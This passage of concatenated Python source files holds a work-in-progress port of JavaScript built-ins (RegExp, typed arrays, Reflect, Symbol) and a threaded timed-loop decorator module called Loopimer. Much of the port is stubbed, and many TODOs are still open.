which to start the next match. @property def dotAll(self): """[Whether . matches newlines or not.] Returns: [bool]: [True if dot matches newlines, False otherwise] """ return "s" in self.flags @dotAll.setter def dotAll(self, value: bool): """[Whether . matches newlines or not.] Args: value (bool): [True if dot matches newlines, False otherwise] """ if 's' not in self.flags: self.flags += "s" if value else "" @property def multiline(self): """[Whether . matches newlines or not.] Returns: [bool]: [True if dot matches newlines, False otherwise] """ return "m" in self.flags @multiline.setter def multiline(self, value: bool): """[Whether . matches newlines or not.] Args: value (bool): [True if dot matches newlines, False otherwise] """ if 'm' not in self.flags: self.flags += "m" if value else "" @property def source(self): """[The text of the pattern.] Returns: [str]: [The text of the pattern.] """ return self.expression @property def global_(self): """[Whether to test the regular expression against all possible matches in a string, or only against the first.] Returns: [bool]: [True if global, False otherwise] """ return "g" in self.flags @global_.setter def global_(self, value: bool): """[Whether to test the regular expression against all possible matches in a string, or only against the first.] Args: value (bool): [True if global, False otherwise] """ if 'g' not in self.flags: self.flags += "g" if value else "" @property def hasIndices(self): """[Whether the regular expression result exposes the start and end indices of captured substrings.] Returns: [bool]: [True if hasIndices, False otherwise] """ return "d" in self.flags @hasIndices.setter def hasIndices(self, value: bool): """[Whether the regular expression result exposes the start and end indices of captured substrings.] Args: value (bool): [True if hasIndices, False otherwise] """ if 'd' not in self.flags: self.flags += "d" if value else "" @property def ignoreCase(self): """[Whether to ignore case while attempting a match in a string.] Returns: [bool]: [True if ignoreCase, False otherwise] """ return "i" in self.flags @ignoreCase.setter def ignoreCase(self, value: bool): """[Whether to ignore case while attempting a match in a string.] Args: value (bool): [True if ignoreCase, False otherwise] """ if 'i' not in self.flags: self.flags += "i" if value else "" @property def unicode(self): """[Whether or not Unicode features are enabled.] Returns: [bool]: [True if unicode, False otherwise] """ return "u" in self.flags @unicode.setter def unicode(self, value: bool): """[Whether or not Unicode features are enabled.] Args: value (bool): [True if unicode, False otherwise] """ if 'u' not in self.flags: self.flags += "u" if value else "" def compile(self): """ (Re-)compiles a regular expression during execution of a script. """ pass # def exec(self, s: str): # TODO - test # """ Executes a search for a match in its string parameter. """ # class Match: # def __init__(self, index: int, match: str): # self.index = index # self.match = match # def __str__(self): # return f'{self.match}' # def __repr__(self): # return f'{self.match}' # def __getitem__(self, index): # return self.match[index] # matches = re.finditer(self.expression, s, flags=re.MULTILINE) # TODO - flags # return [Match(m.start(), m.group(0)) for m in matches] # TODO - wanted to change this to be like above. but d3 required me to rollback. # need to check if i modifed that implementation to fit my needs at the time. def exec(self, s: str): """ Executes a search for a match in its string parameter. """ # print("exec:", self.expression, s) m = re.search(self.expression, s) # print(m) if (m): return [s for s in m.groups()] def test(self, s: str): """[Tests for a match in its string parameter.] Args: s (str): [a string to match] Returns: [bool]: [True if match else False] """ m = re.match(self.expression, s) # print(m) if (m): return True else: return False def toString(self): """ Returns a string representation of the RegExp object. """ return self.__str__() def __str__(self): """" Returns a string representing the specified object. Overrides the Object.prototype.toString() method. """ return self.expression # def [@@match]() # Performs match to given string and returns match result. # def [@@matchAll]() # Returns all matches of the regular expression against a string. # def [@@replace]() # Replaces matches in given string with new substring. # def [@@search]() # Searches the match in given string and returns the index the pattern found in the string. # def [@@split]() # Splits given string into an array by separating the strin def ToInt32(v): return v >> 0 def ToUint32(v): return (v >> 0) if v >= 0 else ((v + 0x100000000) >> 0) class ArrayBuffer: def __init__(self, length): # self.length = length self.buffer = array.array('B', [0] * length) # self.byteLength = length self.isView = False @property def byteLength(self): return self.buffer.buffer_info()[1] def __getitem__(self, index): return self.buffer[index] def __setitem__(self, index, value): self.buffer[index] = value def __getattr__(self, name): # return getattr(self.buffer, name) # TODO - try on self if not get from buffer. (was this a todo)? return getattr(self.buffer, name) def __len__(self): # return self.length return len(self.buffer) @property def length(self): # return self.__length return len(self.buffer) # @length.setter def __str__(self): return str(self.buffer) def __repr__(self): return repr(self.buffer) def slice(self, start, end): return self.buffer[start:end] class DataView(ArrayBuffer): # ?? is this right. don't look lt def __init__(self, buffer, byteOffset=0, byteLength=None): super().__init__(byteLength) self.isView = True self.buffer = buffer self.byteOffset = byteOffset self.byteLength = byteLength def getUint8(self, index): return self.buffer.getUint8(self.byteOffset + index) def getInt8(self, index): return self.buffer.getInt8(self.byteOffset + index) def getUint16(self, index, littleEndian=False): return self.buffer.getUint16(self.byteOffset + index, littleEndian) def getInt16(self, index, littleEndian=False): return self.buffer.getInt16(self.byteOffset + index, littleEndian) def getUint32(self, index, littleEndian=False): return self.buffer.getUint32(self.byteOffset + index, littleEndian) def getInt32(self, index, littleEndian=False): return self.buffer.getInt32(self.byteOffset + index, littleEndian) def getFloat32(self, index, littleEndian=False): return self.buffer.getFloat32(self.byteOffset + index, littleEndian) def getFloat64(self, index, littleEndian=False): return self.buffer.getFloat64(self.byteOffset + index, littleEndian) def setUint8(self, index, value): self.buffer.setUint8(self.byteOffset + index, value) def setInt8(self, index, value): self.buffer.setInt8(self.byteOffset + index, value) def setUint16(self, index, value, littleEndian=False): self.buffer.setUint16(self.byteOffset + index, value, littleEndian) def setInt16(self, index, value, littleEndian=False): self.buffer.setInt16(self.byteOffset + index, value, littleEndian) class TypedArray: BYTES_PER_ELEMENT = 1 def __init__(self, *args): """[ creates a new Int8Array can take the following forms: Int8Array() Int8Array(length) Int8Array(typedArray) Int8Array(object) Int8Array(buffer) Int8Array(buffer, byteOffset) Int8Array(buffer, byteOffset, length) ] """ self.name = "Int8Array" self.byteOffset = 0 # self.BYTES_PER_ELEMENT = Int8Array.BYTES_PER_ELEMENT if len(args) == 0: self.buffer = array.array('B', [0] * 0) self.length = 0 self.byteLength = self.length * self.BYTES_PER_ELEMENT self.isView = False return arg = args[0] # print(arg) # print(type(arg)) if isinstance(arg, (Int8Array, ArrayBuffer)): # self.buffer = arg.buffer # self.byteLength = arg.byteLength # self.length = arg.length # self.isView = arg.isView self.buffer = arg if len(args) > 1: self.byteOffset = args[1] else: self.byteOffset = 0 self.byteOffset = ToUint32(self.byteOffset) # if (this.byteOffset > this.buffer.byteLength) { # throw new RangeError("byteOffset out of range"); # } if self.byteOffset > self.buffer.byteLength: # raise RangeError("byteOffset out of range") raise Exception("byteOffset out of range") # if (this.byteOffset % this.BYTES_PER_ELEMENT) { # // The given byteOffset must be a multiple of the element size of the specific type, # otherwise an exception is raised. # throw new RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size."); # } if self.byteOffset % self.BYTES_PER_ELEMENT: # raise RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.") raise Exception("ArrayBuffer length minus the byteOffset is not a multiple of the element size.") if (len(args) < 3): self.byteLength = self.buffer.byteLength - self.byteOffset if (self.byteLength % self.BYTES_PER_ELEMENT): # raise RangeError("length of buffer minus byteOffset not a multiple of the element size"); raise Exception("length of buffer minus byteOffset not a multiple of the element size") self.length = self.byteLength / self.BYTES_PER_ELEMENT else: self.length = ToUint32(args[2]) self.byteLength = self.length * self.BYTES_PER_ELEMENT if ((self.byteOffset + self.byteLength) > self.buffer.byteLength): # raise RangeError("byteOffset and length reference an area beyond the end of the buffer"); raise Exception("byteOffset and length reference an area beyond the end of the buffer") return # elif isinstance(arg, array.array): # print('c!!!!') # self.buffer = arg # self.byteLength = len(arg) # self.length = len(arg) # self.isView = False # if len(args) == 2: # self.byteOffset = args[1] # if len(args) == 3: # self.byteOffset = args[1] # self.length = args[2] # return elif isinstance(arg, dict): self.buffer = array.array('B', [0] * 0) self.byteLength = 0 # self.length = 0 self.isView = False self.set(arg) return elif isinstance(arg, int): # self.buffer = array.array('B', [0] * arg) print('a!') # self.buffer = ArrayBuffer(arg) # self.byteLength = arg # self.length = arg # self.isView = False # // Constructor(unsigned long length) self.length = ToInt32(args[0]) if (self.length < 0): raise Exception('ArrayBufferView size is not a small enough positive integer') self.byteLength = self.length * self.BYTES_PER_ELEMENT self.buffer = ArrayBuffer(self.byteLength) self.byteOffset = 0 return elif isinstance(arg, list): # print('bb!', arg) # self.buffer = array.array('B', arg) # self.byteLength = len(arg) # self.length = len(arg) # self.isView = False # // Constructor(sequence<type> array) sequence = arg self.length = ToUint32(len(sequence)) self.byteLength = self.length * self.BYTES_PER_ELEMENT self.buffer = ArrayBuffer(self.byteLength) self.byteOffset = 0 for i in range(self.length): s = sequence[i] self.__setitem__(i, Number(s)) return else: raise TypeError("Invalid argument type") # @property # def length(self): # return self.buffer.buffer_info()[1] # @length.setter # def length(self, value): # self.buffer.length = value @property # TODO - test try this for sneaky way of binding to exsiting array methods? def args(self): return self.buffer @staticmethod def of(*args): # Creates a new Int8Array with a variable number of arguments return Int8Array(args) @staticmethod def from_(thing): # Creates a new Int8Array from an array-like or iterable object return Int8Array(thing) # def __getitem__(self, index): # return self.buffer[index] # def __setitem__(self, index, value): # self.buffer[index] = value # // getter type (unsigned long index); def __getitem__(self, index): if index is None: raise SyntaxError("Not enough arguments") index = ToUint32(index) if (index >= self.length): return undefined b = [] i = 0 o = self.byteOffset + index * self.BYTES_PER_ELEMENT for i in range(0, self.BYTES_PER_ELEMENT): b.append(self.buffer[o]) o += 1 return self._unpack(b) # // NONSTANDARD: convenience alias for getter: type get(unsigned long index); get = __getitem__ # // setter void (unsigned long index, type value); def __setitem__(self, index, value): # print('set', index, value) if (index is None and value is None): raise SyntaxError("Not enough arguments") index = ToUint32(index) if (index >= self.length): return undefined b = self._pack(value) # print(b) # print( self._pack(10) ) # print( self._pack(20) ) # print( self._pack(30) ) i = 0 o = self.byteOffset + index * self.BYTES_PER_ELEMENT for i in range(0, self.BYTES_PER_ELEMENT): self.buffer[o] = b[i] # // void set(TypedArray array, optional unsigned long offset); # // void set(sequence<type> array, optional unsigned long offset); def set(self, index, value): if (index is None): raise SyntaxError("Not enough arguments") # arr = None # sequence = None # offset = None # nlen = None # i = None # s = None # d = None # byteOffset = None # byteLength = None # tmp = None if (type(index, object) and index == self): # void set(TypedArray arr, optional unsigned long offset) arr = index offset = ToUint32(value) if (offset + arr.length > self.length): # raise RangeError("Offset plus length of array is out of range") raise Exception("Offset plus length of array is out of range") byteOffset = self.byteOffset + offset * self.BYTES_PER_ELEMENT byteLength = arr.length * self.BYTES_PER_ELEMENT if (arr.buffer == self.buffer): tmp = [] s = arr.byteOffset for i in range(0, byteLength): tmp[i] = arr.buffer[s] s += 1 d = byteOffset for i in range(0, byteLength): self.buffer[d] = tmp[i] d += 1 else: s = arr.byteOffset d = byteOffset for i in range(0, byteLength): self.buffer[d] = arr.buffer[s] s += 1 d += 1 elif (type(index, object) and index != self): # void set(sequence<type> arr, optional unsigned long offset); sequence = index nlen = ToUint32(sequence.length) offset = ToUint32(value) if (offset + nlen > self.length): # raise RangeError("Offset plus length of arr is out of range") raise Exception("Offset plus length of arr is out of range") for i in range(0, len): s = sequence[i] self._setter(offset + i, Number(s)) else: raise TypeError("Unexpected argument type(s)") # // TypedArray subarray(long begin, optional long end); def subarray(self, start, end): def clamp(v, min, max): m1 = max if v > max else v return min if v < min else m1 if start is None: start = 0 if end is None: end = self.length start = ToInt32(start) end = ToInt32(end) if (start < 0): start = self.length + start if (end < 0): end = self.length + end start = clamp(start, 0, self.length) end = clamp(end, 0, self.length) nlen = end - start if (nlen < 0): nlen = 0 return self.__init__(self.buffer, self.byteOffset + start * self.BYTES_PER_ELEMENT, nlen) def as_signed(value, bits): """ Converts an unsigned integer to a signed integer. """ s = 32 - bits mask = (1 << s) - 1 return (value & mask) - (value & (mask << s)) def as_unsigned(value, bits): s = 32 - bits mask = (1 << s) - 1 return value & mask class __byteutils__(): def packI8(self, n): return [n & 0xff] # return struct.pack('B', n) def unpackI8(self, b): return as_signed(b[0], 8) # return struct.unpack('B', b)[0] def packU8(self, n): return [n & 0xff] # return struct.pack('B', n) def unpackU8(self, bytes): return as_unsigned(bytes[0], 8) # return struct.unpack('B', bytes)[0] def packU8Clamped(self, n): n = Math.round(Number(n)) # return [n < 0 ? 0 : n > 0xff ? 0xff : n & 0xff] if (n < 0): return [0] elif (n > 0xff): return [0xff] else: return [n & 0xff] # return struct.pack('B', n) def packI16(self, n): return [(n >> 8) & 0xff, n & 0xff] # return struct.pack('>H', n) def unpackI16(self, bytes): return as_signed(bytes[0] << 8 | bytes[1], 16) # return struct.unpack('>H', bytes)[0] def packU16(self, n): return [(n >> 8) & 0xff, n & 0xff] # return struct.pack('>H', n) def unpackU16(self, bytes): return as_unsigned(bytes[0] << 8 | bytes[1], 16) # return struct.unpack('>H', bytes)[0] def packI32(self, n): return [(n >> 24) & 0xff, (n >> 16) & 0xff, (n >> 8) & 0xff, n & 0xff] # return struct.pack('>I', n) def unpackI32(self, bytes): return as_signed(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32) # return struct.unpack('>I', bytes)[0] def packU32(self, n): return [(n >> 24) & 0xff, (n >> 16) & 0xff, (n >> 8) & 0xff, n & 0xff] # return struct.pack('>I', n) def unpackU32(self, bytes): return as_unsigned(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32) # return struct.unpack('>I', bytes)[0] def packIEEE754(self, v, ebits, fbits): bias = (1 << (ebits - 1)) - 1 def roundToEven(n): w = Math.floor(n) f = n - w if (f < 0.5): return w if (f > 0.5): return w + 1 # return w % 2 ? w + 1 : w return w if (w % 2) else w + 1 # Compute sign, exponent, fraction if (v != v): # NaN # http://dev.w3.org/2006/webapi/WebIDL/#es-type-mapping e = (1 << ebits) - 1 f = pow(2, fbits - 1) s = 0 elif (v == Global.Infinity or v == -Global.Infinity): e = (1 << ebits) - 1 f = 0 # s = (v < 0) ? 1 : 0 s = 1 if (v < 0) else 0 elif (v == 0): e = 0 f = 0 s = 1 if (1 / v == -Global.Infinity) else 0 else: s = v < 0 v = abs(v) if (v >= pow(2, 1 - bias)): e = min(Math.floor(Math.log(v) / Math.LN2), 1023) f = roundToEven(v / pow(2, e) * pow(2, fbits)) if (f / pow(2, fbits) >= 2): e = e + 1 f = 1 if (e > bias): # Overflow e = (1 << ebits) - 1 f = 0 else: # Normalized e = e + bias f = f - pow(2, fbits) else: # Denormalized e = 0 f = roundToEven(v / pow(2, 1 - bias - fbits)) # Pack sign, exponent, fraction bits = [] for i in range(fbits): bits.append(f % 2) f = Math.floor(f / 2) for i in range(ebits): bits.append(e % 2) e = Math.floor(e / 2) bits.append(s) bits.reverse() mystr = bits.join('') # Bits to bytes b = [] while (mystr.length): b.push(parseInt(mystr.substring(0, 8), 2)) mystr = mystr.substring(8) return b def unpackIEEE754(self, bytes, ebits, fbits): # Bytes to bits bits = [] for i in range(len(bytes)): b = bytes[i] for j in range(8): bits.append(1 if b % 2 else 0) b = b >> 1 bits.reverse() mystr = bits.join('') # Unpack sign, exponent, fraction bias = (1 << (ebits - 1)) - 1 # s = parseInt(str.substring(0, 1), 2) ? -1 : 1 s = -1 if (mystr[0] == '1') else 1 e = parseInt(mystr.substring(1, 1 + ebits), 2) f = parseInt(mystr.substring(1 + ebits), 2) # // Produce number if (e == (1 << ebits) - 1): # return f !== 0 ? NaN : s * Infinity if (f != 0): return Global.NaN else: return s * Global.InfInfinity elif (e > 0): # Normalized return s * pow(2, e - bias) * (1 + f / pow(2, fbits)) elif (f != 0): # Denormalized return s * pow(2, -(bias - 1)) * (f / pow(2, fbits)) else: return -0 if s < 0 else 0 def unpackF64(self, b): return self.unpackIEEE754(b, 11, 52) # return struct.unpack('>d', b)[0] def packF64(self, v): return self.packIEEE754(v, 11, 52) # return struct.pack('>d', v) def unpackF32(self, b): return self.unpackIEEE754(b, 8, 23) # return struct.unpack('>f', b)[0] def packF32(self, v): return self.packIEEE754(v, 8, 23) # return struct.pack('>f', v) Int8Array = type('Int8Array', (TypedArray,), {'name': 'Int8Array', '_pack': __byteutils__.packI8, '_unpack': __byteutils__.unpackI8}) Int8Array.BYTES_PER_ELEMENT = 1 Uint8Array = type('Uint8Array', (TypedArray,), {'name': 'Uint8Array', '_pack': __byteutils__.packU8, '_unpack': __byteutils__.unpackU8}) Uint8Array.BYTES_PER_ELEMENT = 1 Uint8ClampedArray = type('Uint8ClampedArray', (TypedArray,), {'name': 'Uint8ClampedArray', '_pack': __byteutils__.packU8Clamped, '_unpack': __byteutils__.unpackU8}) Uint8ClampedArray.BYTES_PER_ELEMENT = 1 Int16Array = type('Int16Array', (TypedArray,), {'name': 'Int16Array', '_pack': __byteutils__.packI16, '_unpack': __byteutils__.unpackI16}) Int16Array.BYTES_PER_ELEMENT = 2 Uint16Array = type('Uint16Array', (TypedArray,), {'name': 'Uint16Array', '_pack': __byteutils__.packU16, '_unpack': __byteutils__.unpackU16}) Uint16Array.BYTES_PER_ELEMENT = 2 Int32Array = type('Int32Array', (TypedArray,), {'name': 'Int32Array', '_pack': __byteutils__.packI32, '_unpack': __byteutils__.unpackI32} ) Int32Array.BYTES_PER_ELEMENT = 4 Uint32Array = type('Uint32Array', (TypedArray,), {'name': 'Uint32Array', '_pack': __byteutils__.packU32, '_unpack': __byteutils__.unpackU32}) Uint32Array.BYTES_PER_ELEMENT = 4 Float32Array = type('Float32Array', (TypedArray,), {'name': 'Float32Array', '_pack': __byteutils__.packF32, '_unpack': __byteutils__.unpackF32}) Float32Array.BYTES_PER_ELEMENT = 4 Float64Array = type('Float64Array', (TypedArray,), {'name': 'Float64Array', '_pack': __byteutils__.packF64, '_unpack': __byteutils__.unpackF64}) Float64Array.BYTES_PER_ELEMENT = 8 # BigInt64Array = type('BigInt64Array', # (TypedArray,), {'name': 'BigInt64Array', '_pack': __byteutils__.packI64, '_unpack': __byteutils__.unpackI64}) # BigInt64Array.BYTES_PER_ELEMENT = 8 # BigUint64Array = type('BigUint64Array', # (TypedArray,), {'name': 'BigUint64Array', '_pack': __byteutils__.packU64, '_unpack': __byteutils__.unpackU64}) # BigUint64Array.BYTES_PER_ELEMENT = 8 # TODO - test class Error(Exception): ''' Raise Errors ''' def __init__(self, message, *args, **kwargs): self.message = message super(Error, self).__init__(message) # def __str__(self): # return self.message # Error # AggregateError # EvalError # InternalError # RangeError # ReferenceError # SyntaxError # TypeError # URIError # ---- STUBBING OUT SOME NEW ONES TO WORK ON ---- class Reflect(): """ The Reflect object provides the following static functions which have the same names as the proxy handler methods. Some of these methods are also the same as corresponding methods on Object, although they do have some subtle differences between them. """ @staticmethod def ownKeys(target): """ Returns an array of the target object's own (not inherited) property keys. """ return target.keys() # return target.__dict__.keys() @staticmethod def apply(target, thisArgument, argumentsList): """ Calls a target function with arguments as specified by the argumentsList parameter. See also Function.prototype.apply(). """ return target(*argumentsList) @staticmethod def construct(target, argumentsList, newTarget): """ The new operator as a function. Equivalent to calling new target(...argumentsList). Also provides the option to specify a different prototype. """ raise NotImplementedError @staticmethod def defineProperty(target, propertyKey, attributes): """ Similar to Object.defineProperty(). Returns a Boolean that is true if the property was successfully defined. """ raise NotImplementedError @staticmethod def deleteProperty(target, propertyKey): """ The delete operator as a function. Equivalent to calling delete target[propertyKey]. """ raise NotImplementedError @staticmethod def get(target, propertyKey, receiver): """ Returns the value of the property. Works like getting a property from an object (target[propertyKey]) as a function. """ raise NotImplementedError @staticmethod def getOwnPropertyDescriptor(target, propertyKey): """ Similar to Object.getOwnPropertyDescriptor(). Returns a property descriptor of the given property if it exists on the object, undefined otherwise. """ raise NotImplementedError getPrototypeOf = Object.getPrototypeOf # isExtensible = Object.isExtensible @staticmethod def has(target, propertyKey): """ Returns a Boolean indicating whether the target has the property. Either as own or inherited. Works like the in operator as a function. """ raise NotImplementedError @staticmethod def preventExtensions(target): """ Similar to Object.preventExtensions(). Returns a Boolean that is true if the update was successful. """ raise NotImplementedError @staticmethod def set(target, propertyKey, value, receiver): """ A function that assigns values to properties. Returns a Boolean that is true if the update was successful. """ raise NotImplementedError @staticmethod def setPrototypeOf(target, prototype): """ A function that sets the prototype of an object. Returns a Boolean that is true if the update was successful. """ raise NotImplementedError class Symbol(): # a global registry for symbols registry = [] # Creates a new Symbol object. def __init__(self, symbol): self.symbol = symbol self.description = None self.registry.append(self) # self.__class__.registry = self.registry def hasInstance(self, obj): """[A method determining if a constructor object recognizes an object as its instance. Used by instanceof.] Args: obj ([type]): [a constructor object] Returns: [type]: [True if obj is an instance of this symbol, False otherwise] """ return self.symbol == obj.symbol def isConcatSpreadable(self): """ A Boolean value indicating if an object should be flattened to its array elements. Used by Array.prototype.concat().""" return False def iterator(self, obj): """ A method returning the default iterator for an object. Used by for...of. """ return iter(obj) def asyncIterator(self, obj): """ A method that returns the default AsyncIterator for an object. Used by for await...of. """ return iter(obj) # A method that matches against a string, also used to determine if an object may be used as a regular expression. def match(self, item): """ A method that matches the symbol against a string, also used to determine if an object may be used as a regular expression. """ raise NotImplementedError # A method that returns an iterator, that yields matches of the regular expression against a string. # Used by String.prototype.matchAll(). # def matchAll(self, obj): # if isinstance(obj, str): # return obj == self.symbol # return False # A method that replaces matched substrings of a string. Used by String.prototype.replace(). # def replace(self, # A method that returns the index within a string that matches the regular expression. # Used by String.prototype.search(). def search(self): raise NotImplementedError # A method that splits a string at the indices that match a regular expression. Used by String.prototype.split(). def split(self): raise NotImplementedError # A constructor function that is used to create derived objects. def species(self): raise NotImplementedError # A method converting an object to a primitive value. def toPrimitive(self): raise NotImplementedError # A string value used for the default description of an object. # Used by Object.prototype.toString(). def toStringTag(self): raise NotImplementedError # An object value of whose own and inherited property names are excluded from the with environment bindings of the associated object. def unscopables(self): raise NotImplementedError # @staticmethod # def for(key): # """ Searches for existing Symbols with the given key and returns it if found. # Otherwise a new Symbol gets created in the global Symbol registry with key. """ # raise NotImplementedError # @staticmethod # def keyFor(sym) # """ Retrieves a shared Symbol key from the global Symbol registry for the given Symbol. """ # raise NotImplementedError def toSource(self): """ Returns a string containing the source of the Symbol. Overrides the Object.prototype.toSource() method. """ raise NotImplementedError def toString(self): """ Returns a string containing the description of the Symbol. Overrides the Object.prototype.toString() method. """ raise NotImplementedError def valueOf(self): """ Returns the Symbol. Overrides the Object.prototype.valueOf() method. """ raise NotImplementedError # class _TNow: # def timeZone(): # pass # def instant(): # pass # def plainDateTime(calendar, temporalTimeZoneLike): # pass # def plainDateTimeISO(temporalTimeZoneLike): # pass # def zonedDateTime(calendar, temporalTimeZoneLike): # pass # def zonedDateTimeISO(temporalTimeZoneLike): # pass # def plainDate(calendar, temporalTimeZoneLike): # pass # def plainDateISO(temporalTimeZoneLike): # pass # def plainTimeISO(temporalTimeZoneLike): # pass # class Temporal(Object): # @staticmethod # def Now(self): # return _TNow() # @staticmethod # def _from(self, temporal): # pass ''' class Atomics(): """ The Atomics object provides atomic operations as static methods They are used with SharedArrayBuffer and ArrayBuffer objects. When memory is shared, multiple threads can read and write the same data in memory. Atomic operations make sure that predictable values are written and read, that operations are finished before the next operation starts and that operations are not interrupted. Wait and notify The wait() and notify() methods are modeled on Linux futexes ("fast user-space mutex") and provide ways for waiting until a certain condition becomes true and are typically used as blocking constructs. """ @staticmethod def add(array, index, value): """ Adds the provided value to the existing value at the specified index of the array. Returns the old value at that index.""" return array.add(index, value) def and_(array, index, value): """ Computes a bitwise AND on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise NotImplementedError @staticmethod """ Stores a value at the specified index of the array, if it equals a value. Returns the old value.""" def compareExchange(array, index, value): raise NotImplementedError @staticmethod def exchange(): """ Stores a value at the specified index of the array. Returns the old value.""" raise NotImplementedError @staticmethod def isLockFree(size): """ An optimization primitive that can be used to determine whether to use locks or atomic operations. Returns true if an atomic operation on arrays of the given element size will be implemented using a hardware atomic operation (as opposed to a lock). Experts only.""" raise NotImplementedError @staticmethod def load(): """ Returns the value at the specified index of the array.""" raise NotImplementedError # @staticmethod # """ Notifies agents that are waiting on the specified index of the array. # Returns the number of agents that were notified.""" # def notify( @staticmethod def or_(): """ Computes a bitwise OR on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise NotImplementedError @staticmethod def store(): """ Stores a value at the specified index of the array. Returns the value.""" raise NotImplementedError @staticmethod def sub(): """ Subtracts a value at the specified index of the array. Returns the old value at that index.""" raise NotImplementedError @staticmethod def wait(): """ Verifies that the specified index of the array still contains a value and sleeps awaiting or times out. Returns either "ok", "not-equal", or "timed-out". If waiting is not allowed in the calling agent then it throws an Error exception. (Most browsers will not allow wait() on the browser's main thread.)""" raise NotImplementedError @staticmethod def xor(): """ Computes a bitwise XOR on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise NotImplementedError ''' # debugger Stops the execution of JavaScript, and calls (if available) the debugging function Statements
Loopimer.py
import threading import time import datetime as dt from threading import Semaphore,Timer import queue import math import sys import os class loopi: def __init__(self,**kwargs): self.__kwargs=kwargs def _nslice(s, n, truncate=False, reverse=False): """Splits s into n-sized chunks, optionally reversing the chunks.""" assert n > 0 while len(s) >= n: if reverse: yield s[:n][::-1] else: yield s[:n] s = s[n:] if len(s) and not truncate: yield (s) self._loop=False self.print_it=False self._start_time=0 self._input=[0] if(('target' in self.__kwargs) and (self.__kwargs['target'] is not None)): if(('n_splits' in self.__kwargs) and (self.__kwargs['n_splits'] is not None)): self._input=_nslice(self.__kwargs['target'],self.__kwargs['n_splits']) else: self._input=[0] self.sequence = queue.Queue() self._joined=True self._minutes=0 self._seconds=0 self._hours=0 self._total_seconds=0 self._timedelta=dt.timedelta(hours=0,minutes=0,seconds=0,milliseconds=0 ,microseconds=0) self._strftime=0 self._activeEvent=False self._lock = threading.Lock() self._timerEnd=threading.Event() self._killit=threading.Event() self._keep_alive=False self._target_function=None self.pause=0 self._kwargs=None self._timer_thread=None self._running_thread=None self.counter=0 self.start_time=0 self.now=0 self.elapsed=dt.timedelta(hours=0,minutes=0,seconds=0,milliseconds=0 ,microseconds=0) self.total_seconds=0 self._output=None self._parent=None #put slices in queue for item in self._input: self.sequence.put(item) if(not any([key in self.__dict__ for key in self.__kwargs.keys()])): self.__dict__.update(kwargs) else: raise ValueError('naming conflict detected', [ key for key in kwargs.keys() if(key in self.__dict__)]) def apply_to(self,function,**kwargs): self._target_function=function self._kwargs=kwargs def s_print(self,*a, **b): with (self._lock): print(*a, **b,end="\r") def _trigger(self,): self._timerEnd.clear() while (not self.sequence.empty()): if(not self._loop): self._loop=False self._timerEnd.set() break else: time.sleep(1) td=dt.datetime.now()-self._start_time self._timedelta=td self._hours, remainder = divmod(td.seconds, 3600) self._minutes, self._seconds = divmod(remainder, 60) self._total_seconds=td.total_seconds() self._strftime="{:0>2}:{:0>2}:{:0>2}".format(int(self._hours),int(self._minutes),int(self._seconds)) if (self.print_it): self.s_print(self._strftime) if (self.print_it): self.s_print('\r') self._loop=False self._timerEnd.set() def _start(self,print_it=False): if(not self._loop): self.print_it=print_it self._start_time=dt.datetime.now() main_trigger=threading.Thread(target=self._trigger) main_trigger.setDaemon(True) self._loop=True self._timer_thread=main_trigger main_trigger.start() def stop(self,): self._loop=False def get(self,): return(self.sequence.get()) def kill(self,): while (self._keep_alive): self._keep_alive=False if(self._loop): self._loop=False def _eventTrigger(self,total_seconds): while (not self.sequence.empty()): if(self._total_seconds>=total_seconds): # self.s_print('triggered',self._loop) self.stop() break def addTimeEvent(self,total_seconds=None): event_trigger=threading.Thread(target=self._eventTrigger,args=(total_seconds,)) event_trigger.setDaemon(True) event_trigger.start() def _simpleloopTrigger(self,every): while (not self.sequence.empty()): if(not self._keep_alive): break else: time.sleep(every) if(self._target_function and self._keep_alive): self._target_function(self,**self._kwargs) else: break def _loop_timer(self,): while (not self.sequence.empty()): if(not self._keep_alive): break else: if(self._target_function and self._keep_alive): self.now=dt.datetime.now() self.elapsed=self.now-self.start_time self.total_seconds=self.elapsed.total_seconds() else: break def startSimpleLoop(self,every=None): loop_trigger=threading.Thread(target=self._simpleloopTrigger,args=(every,)) loop_trigger.setDaemon(True) self._keep_alive=True self._running_thread=loop_trigger loop_trigger.start() def _timedloopTrigger(self,): while (not self.sequence.empty()): every=self.every if(self._output): self._parent._output=self._output self.kill() if(not self._keep_alive): break else: time.sleep(every) if(self.pause>0): # self.s_print("Process suspended for ", self.pause," seconds") self._start(True) time.sleep(self.pause) self.pause=0 self.stop() self._timerEnd.wait() if(self._target_function and self._keep_alive): if(self.pause>0 and not self._timerEnd.isSet()): continue elif(self.pause==0): self.counter=self.counter+1 self._output=self._target_function(self,**self._kwargs) else: break def startTimedLoop(self,parent,every=0): loop_trigger=threading.Thread(name='loopimer_main',target=self._timedloopTrigger,args=()) loop_trigger.setDaemon(True) loop_timer_trigger=threading.Thread(name='loopimer_timer',target=self._loop_timer,args=()) loop_timer_trigger.setDaemon(True) self._keep_alive=True self.counter=0 self._running_thread=loop_trigger self.start_time=dt.datetime.now() self._parent=parent loop_trigger.start() loop_timer_trigger.start() if(self._joined): loop_trigger.join() class loopimer: def __init__(self, *args,**kwargs): self.kwargs=kwargs self.ltimer=None self._output=None self._joined=True def __call__(self, func): def wrapper(*args,**kwargs): if('joined' in self.kwargs): self._joined=self.kwargs['joined'] self.kwargs.pop('joined') self.ltimer=loopi(**self.kwargs) self.ltimer._joined=self._joined self.ltimer.apply_to(func,**kwargs) self.ltimer.startTimedLoop(self,self.kwargs['every']) return(self._output) return wrapper
crawlin.py
